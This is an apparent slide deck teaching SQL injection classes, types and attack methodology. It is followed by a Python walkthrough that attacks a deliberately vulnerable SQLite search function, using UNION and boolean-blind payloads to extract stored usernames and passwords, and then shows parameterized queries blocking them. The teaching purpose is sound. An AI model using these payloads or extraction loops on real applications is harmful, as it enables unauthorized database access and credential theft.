Web Based SQL Injection

This document discusses SQL injection: what it is, the classes and types of SQL injection, and a methodology for exploiting SQL injection vulnerabilities. SQL injection occurs when attacker-controlled input (for example from a web form) is inserted into a database query as SQL code. There are three classes: in-band extracts data over the same channel used to inject the code; out-of-band retrieves data over a different channel, such as email; inferential transfers no data directly but reconstructs information by sending particular requests and observing the server's behavior. The types are error-based (provoking errors and gleaning information from them), union-based (combining the results of two or more SELECT queries) and blind (asking true/false questions). The methodology identifies the injection, determines its type (integer or string), then attacks with error-based, union-based or blind techniques, from easiest to hardest.

Uploaded by Yagouba Diallo
Copyright
© Attribution Non-Commercial (BY-NC)

WEB BASED SQL INJECTION

Yagouba Diallo WEK100734

Agenda
What is SQLi
SQL injection classes
SQL injection types
Methodology

What is SQL and SQLi

SQL (Structured Query Language) is the language used to communicate with the database.
SQL injection (SQLi) is a code injection technique that exploits a security vulnerability in an application. The injection occurs at the database layer of the application: user input is concatenated into a query and the database parses it as SQL.

SQL injection classes

We have 3 classes:
IN-BAND: data is extracted over the same channel that is used to inject the code (the normal HTTP response).
OUT-OF-BAND: data is retrieved over a different channel, e.g. email, or a DNS or HTTP request that the database server is made to issue.
INFERENTIAL: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB server.

SQL injection types

We have 3 types:
Error based: asking the DB a question that will cause an error, and gleaning information from the error message.
Union based: uses UNION to combine the results of 2 or more SELECT statements, so attacker-chosen rows come back in the original query's result columns (the column count must match).
Blind: asking the DB a true/false question and using either whether the valid page is returned or not (boolean-based) or the time it took for the valid page to return (time-based) as the answer to the question.

Methodology

IDENTIFY:
Identify the injection (tool or manual, e.g. a lone quote that produces an error, or a true/false condition that changes the page).
Determine the injection type (integer or string) so the payload can be placed in the right context.

ATTACK, from easiest to hardest:
Error based (easiest)
Union based (great for data extraction)
Blind based (worst case and last resort)
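The following is an added worked example (not part of the original slides) that carries the deck's methodology through against a constructed vulnerable endpoint. It models a product search backed by SQLite that builds its query by string concatenation, then performs the identify step (lone-quote test, integer vs string detection with true/false conditions), a union-based extraction and a boolean-based blind extraction, and finally runs the same attacks against a parameterized version of the query to show they fail. The schema, rows, function names and the `as_web_endpoint` wrapper are all assumptions made for this demo.

```python
"""SQL injection walk-through (added example; the data and endpoint are constructed).

A search endpoint backed by SQLite pastes user input into its query, the
vulnerable pattern the deck describes. The functions below follow the deck's
methodology against it: identify the injection, determine integer vs string
type, then attack with union-based (in-band) and blind (inferential) techniques.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: products the page lists, users the attacker wants."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        INSERT INTO products VALUES (1,'apple'),(2,'banana'),(3,'cherry');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'admin','s3cret'),(2,'bob','hunter2');
    """)
    return con


CON = make_db()


def vulnerable_search(product_id: str) -> list:
    """Intentionally vulnerable: the input becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    return [row[0] for row in CON.execute(sql)]


def safe_search(product_id: str) -> list:
    """Hardened: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in CON.execute(sql, (product_id,))]


def as_web_endpoint(handler):
    """Model the web tier: a database error becomes None (the app's error page)
    instead of an exception. That error page is what error-based injection reads."""
    def fetch(value: str):
        try:
            return handler(value)
        except sqlite3.Error:
            return None
    return fetch


VULN = as_web_endpoint(vulnerable_search)
SAFE = as_web_endpoint(safe_search)


def quote_breaks_query(fetch) -> bool:
    """Manual identification: an error page for a lone quote means the input
    reached the SQL parser."""
    return fetch("1'") is None


def identify(fetch) -> str:
    """Determine the injection type by comparing a true and a false condition
    against the normal page. Returns 'integer', 'string' or 'none'."""
    baseline = fetch("1")
    # Integer context: no quotes needed, bare boolean logic is evaluated.
    if fetch("1 AND 1=1") == baseline and fetch("1 AND 1=2") != baseline:
        return "integer"
    # String context: break out of the surrounding quotes first.
    if fetch("1' AND '1'='1") == baseline and fetch("1' AND '1'='2") != baseline:
        return "string"
    return "none"


def union_extract(fetch) -> list:
    """Union-based (in-band): append a SELECT over the users table so its rows
    come back in the original result column. Column counts must match (one)."""
    return fetch("0 UNION SELECT username || ':' || password FROM users")


def blind_extract(fetch, secret_query: str, max_len: int = 32) -> str:
    """Blind (inferential, boolean-based): nothing is echoed, so ask one yes/no
    question per character and read the answer off whether the normal page
    comes back. secret_query is a scalar subquery yielding the secret."""
    normal_page = fetch("1")
    secret = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            cond = f"1 AND unicode(substr(({secret_query}),{pos},1))={code}"
            if fetch(cond) == normal_page:
                secret += chr(code)
                break
        else:
            break  # substr past the end is '' -> unicode('') is NULL -> never true
    return secret


if __name__ == "__main__":
    admin = "SELECT password FROM users WHERE username='admin'"
    print("quote breaks query:", quote_breaks_query(VULN))
    print("injection type:", identify(VULN))
    print("union-based:", union_extract(VULN))
    print("blind:", blind_extract(VULN, admin))
    print("hardened:", identify(SAFE), union_extract(SAFE), repr(blind_extract(SAFE, admin)))
```

The blind step needs roughly 95 requests per character, which is why the deck ranks it as the last resort; time-based blind works the same way with a delay function in place of the page comparison, but SQLite has no sleep function so it is not shown. Against `safe_search` the bound parameter is compared as a value, so the lone quote, the boolean conditions and the UNION all return no rows and extract nothing.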
